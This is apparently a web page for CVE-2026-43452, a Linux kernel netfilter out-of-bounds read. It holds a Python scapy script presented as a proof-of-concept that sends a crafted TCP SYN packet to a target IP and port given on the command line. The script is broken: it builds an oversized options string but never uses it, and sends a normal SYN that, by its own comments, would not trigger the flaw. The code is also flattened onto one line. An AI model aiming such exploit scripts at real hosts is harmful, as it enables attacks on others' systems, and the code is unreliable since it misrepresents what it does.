CVE-2026-43452 Linux内核netfilter越界读取漏洞

#!/usr/bin/env python3 # PoC for CVE-2026-43452: Linux Kernel netfilter OOB Read # This script demonstrates how to craft a packet that may trigger the vulnerability. # It requires scapy to be installed. from scapy.all import * import sys def send_poc(target_ip, target_port): # Construct a TCP SYN packet # The vulnerability is triggered when the last byte of the options is > 1 # and the walker tries to read the length byte (op[i+1]) which is out of bounds. # Standard options padding is usually NOP (1) or EOL (0). We need a byte > 1 at the boundary. # Note: Successfully triggering this depends on the stack processing order. # Craft raw options: filling the 40-byte option space mostly with NOPs, # but putting a specific byte at the end. # This is a simplified representation. custom_options = b"\x02\x04\x05\xB4" # MSS custom_options += b"\x01" * 36 # Padding # Modify the last byte (index 39) to be a kind that expects a length (e.g., 0xFF) # However, Scapy handles padding automatically. We leverage the raw layer or specific option manipulation. ip = IP(dst=target_ip) tcp = TCP(sport=RandShort(), dport=target_port, flags="S", options=[('MSS', 1460)]) # To strictly hit the boundary, one might need to manipulate the packet buffer directly # which is complex in high-level libs. This demonstrates the intent. print(f"[*] Sending PoC packet to {target_ip}:{target_port}") send(ip/tcp, verbose=0) print("[+] Packet sent.") if __name__ == "__main__": if len(sys.argv) != 3: print(f"Usage: {sys.argv[0]} <target_ip> <target_port>") sys.exit(1) send_poc(sys.argv[1], int(sys.argv[2]))